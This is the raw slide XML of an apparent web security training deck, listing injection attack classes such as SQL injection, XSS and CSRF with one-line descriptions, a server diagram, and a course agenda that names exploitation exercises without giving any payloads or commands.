                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attackers inject code into some form of user input, with the goal of an interpreter somewhere processing it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Examples include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the backend data store</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the trust an application has in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> the user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the clients of an application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enhances other attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6642100" y="2895600"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="4114800"/>
            <a:ext cx="0" cy="1143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032" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7023100" y="1524000"/>
            <a:ext cx="762000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 27500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66FF33"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7404100" y="23622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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6946900" y="5257800"/>
            <a:ext cx="990600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Freeform 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5389563" y="2878138"/>
            <a:ext cx="2476500" cy="1465262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1560"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1560"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1560"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1560"/>
              <a:gd name="T10" fmla="*/ 0 h 923"/>
              <a:gd name="T11" fmla="*/ 1560 w 1560"/>
              <a:gd name="T12" fmla="*/ 923 h 923"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1560" h="923">
                <a:moveTo>
                  <a:pt x="0" y="923"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="217" y="785"/>
                  <a:pt x="1046" y="186"/>
                  <a:pt x="1303" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1560" y="0"/>
                  <a:pt x="1495" y="306"/>
                  <a:pt x="1545" y="362"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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036" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="1981200"/>
            <a:ext cx="982663" cy="94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Command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>and Code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Freeform 41"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5368925" y="2133600"/>
            <a:ext cx="1806575" cy="2090738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1138"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1317"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1138"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1317"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1138"/>
              <a:gd name="T5" fmla="*/ 0 h 1317"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1138"/>
              <a:gd name="T10" fmla="*/ 0 h 1317"/>
              <a:gd name="T11" fmla="*/ 1138 w 1138"/>
              <a:gd name="T12" fmla="*/ 1317 h 1317"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1138" h="1317">
                <a:moveTo>
                  <a:pt x="0" y="1317"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="1187"/>
                  <a:pt x="742" y="768"/>
                  <a:pt x="932" y="549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122" y="330"/>
                  <a:pt x="1095" y="114"/>
                  <a:pt x="1138" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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038" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5962650" y="2209800"/>
            <a:ext cx="865188"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SQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346700" y="3571875"/>
            <a:ext cx="1836738" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1157"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1157"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1157"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1157"/>
              <a:gd name="T10" fmla="*/ 0 h 1110"/>
              <a:gd name="T11" fmla="*/ 1157 w 1157"/>
              <a:gd name="T12" fmla="*/ 1110 h 1110"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1157" h="1110">
                <a:moveTo>
                  <a:pt x="0" y="582"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="500"/>
                  <a:pt x="791" y="0"/>
                  <a:pt x="974" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1157" y="176"/>
                  <a:pt x="1072" y="897"/>
                  <a:pt x="1097" y="1110"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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040" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6040438" y="4165600"/>
            <a:ext cx="1395412"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CSRF,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>XSS, and HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7785100" y="2576513"/>
            <a:ext cx="215900" cy="471487"/>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nvGrpSpPr>
          <p:cNvPr id="1042" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4999038" y="3505200"/>
            <a:ext cx="1020762" cy="1498600"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="1026" name="Object 9"/>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35884" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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43" name="Rectangle 36"/>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1044" name="Group 37"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1045" name="Freeform 38"/>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6" name="Freeform 39"/>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7" name="Freeform 40"/>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8" name="Freeform 41"/>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9" name="Freeform 42"/>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0" name="Freeform 43"/>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1" name="Freeform 44"/>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2" name="Freeform 45"/>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3" name="Freeform 46"/>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4" name="Freeform 47"/>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5" name="Freeform 48"/>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6" name="Freeform 49"/>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7" name="Freeform 50"/>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8" name="Freeform 51"/>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9" name="Freeform 52"/>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0" name="Freeform 53"/>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1" name="Freeform 54"/>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2" name="Freeform 55"/>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3" name="Freeform 56"/>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4" name="Freeform 57"/>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5" name="Freeform 58"/>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6" name="Freeform 59"/>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7" name="Freeform 60"/>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explore</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353520" y="1771340"/>
            <a:ext cx="7315200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Dig into various vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Figure out new methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Expand our knowledge of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Research helps us all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Just have fun!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189444" name="Picture 4" descr="j01958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8888" y="2514600"/>
            <a:ext cx="244475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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323540" y="1801320"/>
            <a:ext cx="5867400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Write papers to explain the issues, how to find them and solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Present to local groups and organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Teach classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190468" name="Picture 5" descr="j03012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3950" y="1981200"/>
            <a:ext cx="294005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191491"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65618"/>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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Bypass Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Authentication Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Authentication Bypass Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> File Handling with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> OS Interaction with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>sqlmap Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Port Scanning with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> File Injection with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Prepared Injection Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
